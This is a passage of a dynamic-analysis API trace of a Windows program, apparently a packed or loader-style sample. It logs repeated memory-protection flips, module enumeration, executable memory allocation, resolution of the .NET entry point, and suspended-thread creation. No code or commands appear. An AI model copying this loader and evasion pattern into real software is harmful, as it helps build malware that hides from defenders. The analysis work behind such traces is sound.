BaseAddress=0x41f538*=0x755912c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.721] GetCurrentProcess () returned 0xffffffff [0053.721] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.722] GetCurrentProcess () returned 0xffffffff [0053.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.722] GetCurrentProcess () returned 0xffffffff [0053.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.722] GetCurrentProcess () returned 0xffffffff [0053.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.722] GetCurrentProcess () returned 0xffffffff [0053.722] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.723] GetCurrentProcess () returned 0xffffffff [0053.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912d8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.723] GetCurrentProcess () returned 0xffffffff [0053.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912d8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.723] GetCurrentProcess () returned 0xffffffff [0053.723] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.724] GetCurrentProcess () returned 0xffffffff [0053.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.724] GetCurrentProcess () returned 0xffffffff [0053.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7559134c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.724] GetCurrentProcess () returned 0xffffffff [0053.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7559134c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.724] GetCurrentProcess () returned 0xffffffff [0053.724] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591350, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.725] GetCurrentProcess () returned 0xffffffff [0053.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591350, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.725] GetCurrentProcess () returned 0xffffffff [0053.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591358, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.725] GetCurrentProcess () returned 0xffffffff [0053.725] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591358, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.726] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.726] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75581034, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75581000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.727] GetCurrentProcess () returned 0xffffffff [0053.727] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75581034, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75581000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.727] GetCurrentProcess () returned 0xffffffff [0053.727] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75581040, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75581000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.727] GetCurrentProcess () returned 0xffffffff [0053.727] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75581040, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75581000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.728] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.728] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751000e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.729] GetCurrentProcess () returned 0xffffffff [0053.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751000e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.729] GetCurrentProcess () returned 0xffffffff [0053.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751000f4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.729] GetCurrentProcess () returned 0xffffffff [0053.729] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751000f4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100140, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.730] GetCurrentProcess () returned 0xffffffff [0053.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100140, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.730] GetCurrentProcess () returned 0xffffffff [0053.730] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100150, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.731] GetCurrentProcess () returned 0xffffffff [0053.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100150, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.731] GetCurrentProcess () returned 0xffffffff [0053.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7510015c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.731] GetCurrentProcess () returned 0xffffffff [0053.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7510015c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.731] GetCurrentProcess () returned 0xffffffff [0053.731] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7510016c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.732] GetCurrentProcess () returned 0xffffffff [0053.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7510016c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.732] GetCurrentProcess () returned 0xffffffff [0053.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100180, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.732] GetCurrentProcess () returned 0xffffffff [0053.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100180, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.732] GetCurrentProcess () returned 0xffffffff [0053.732] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100194, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.733] GetCurrentProcess () returned 0xffffffff [0053.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100194, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.733] GetCurrentProcess () returned 0xffffffff [0053.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751001a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.733] GetCurrentProcess () returned 0xffffffff [0053.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751001a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.733] GetCurrentProcess () returned 0xffffffff [0053.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751001d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.733] GetCurrentProcess () returned 0xffffffff [0053.733] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751001d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.734] GetCurrentProcess () returned 0xffffffff [0053.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751001d8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.734] GetCurrentProcess () returned 0xffffffff [0053.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x751001d8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.734] GetCurrentProcess () returned 0xffffffff [0053.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100200, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.734] GetCurrentProcess () returned 0xffffffff [0053.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100200, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.734] GetCurrentProcess () returned 0xffffffff [0053.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100238, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.735] GetCurrentProcess () returned 0xffffffff [0053.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100238, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.735] GetCurrentProcess () returned 0xffffffff [0053.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100244, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.735] GetCurrentProcess () returned 0xffffffff [0053.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75100244, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75100000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.735] GetCurrentProcess () returned 0xffffffff [0053.736] GetCurrentProcess () returned 0xffffffff [0053.736] GetCurrentProcess () returned 0xffffffff [0053.736] GetCurrentProcess () returned 0xffffffff [0053.736] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.737] GetCurrentProcess () returned 0xffffffff [0053.737] GetCurrentProcess () returned 0xffffffff [0053.737] GetCurrentProcess () returned 0xffffffff [0053.737] GetCurrentProcess () returned 0xffffffff [0053.738] GetCurrentProcess () returned 0xffffffff [0053.738] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 0 [0053.738] CloseHandle (hObject=0x110) returned 1 [0053.739] VirtualAlloc (lpAddress=0xb14000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0xb14000 [0053.740] VirtualFree (lpAddress=0xb1c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.740] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21c08, cbMultiByte=11, lpWideCharStr=0x41e704, cchWideChar=2047 | out: lpWideCharStr="mscoree.dllF5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆ﴱmA䘨盤ﶌmAV") returned 11 [0053.740] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="mscoree.dll", cchWideChar=11, lpMultiByteStr=0x41e704, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mscoree.dll", lpUsedDefaultChar=0x0) returned 11 [0053.740] RtlInitString (in: DestinationString=0x41f6dc, SourceString="_CorExeMain" | out: DestinationString="_CorExeMain") [0053.741] LdrGetProcedureAddress (in: BaseAddress=0x75620000, Name="_CorExeMain", Ordinal=0x0, ProcedureAddress=0x41f6e4 | out: ProcedureAddress=0x41f6e4*=0x75624ddb) returned 0x0 [0053.741] VirtualFree (lpAddress=0xb14000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.741] VirtualFree (lpAddress=0xb18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.741] VirtualAlloc (lpAddress=0xb24000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xb24000 [0053.743] VirtualFree (lpAddress=0xb24000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0053.743] VirtualAlloc (lpAddress=0xb24000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xb24000 [0053.745] VirtualFree (lpAddress=0xb24000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0053.745] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.745] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.745] VirtualAlloc (lpAddress=0xb24000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xb24000 [0053.747] VirtualFree (lpAddress=0xb24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.747] VirtualAlloc (lpAddress=0xb24000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xb24000 [0053.749] VirtualFree (lpAddress=0xb24000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0053.749] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.750] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.750] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.750] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.750] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.750] VirtualAlloc (lpAddress=0xb24000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0xb24000 [0053.751] VirtualProtect (in: lpAddress=0x13c0000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x41f7a0 | out: lpflOldProtect=0x41f7a0*=0x2) returned 1 [0053.751] VirtualProtect (in: lpAddress=0x13c0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x41f7a4 | out: lpflOldProtect=0x41f7a4*=0x4) returned 1 [0053.751] VirtualProtect (in: lpAddress=0x13c0000, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x41f7a4 | out: lpflOldProtect=0x41f7a4*=0x2) returned 1 [0053.751] VirtualProtect (in: lpAddress=0x13c0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x41f7a4 | out: lpflOldProtect=0x41f7a4*=0x40) returned 1 [0053.752] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x13d21e0, lpParameter=0xae2694, dwCreationFlags=0x4, lpThreadId=0xb33978 | out: lpThreadId=0xb33978*=0xa44) returned 0x110 [0053.753] GetLocalTime (in: lpSystemTime=0x41f77c | out: lpSystemTime=0x41f77c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x20, wMilliseconds=0x1b)) [0053.753] ResumeThread (hThread=0x110) returned 0x1 [0053.753] SetTimer (hWnd=0x0, nIDEvent=0x1, uElapse=0x1157, lpTimerFunc=0x14bbcf0) returned 0x7f9c [0053.753] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.753] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.753] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.753] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.753] VirtualFree (lpAddress=0xb34000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0053.754] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.754] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.754] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.754] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f794, dwLength=0x1c | out: lpBuffer=0x41f794*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.786] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21b68, cbMultiByte=12, lpWideCharStr=0x41e4a8, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dllindows") returned 12 [0053.786] SysReAllocStringLen (in: pbstr=0x41f4ac*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x41f4ac*="ADVAPI32.dll") returned 1 [0053.786] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") 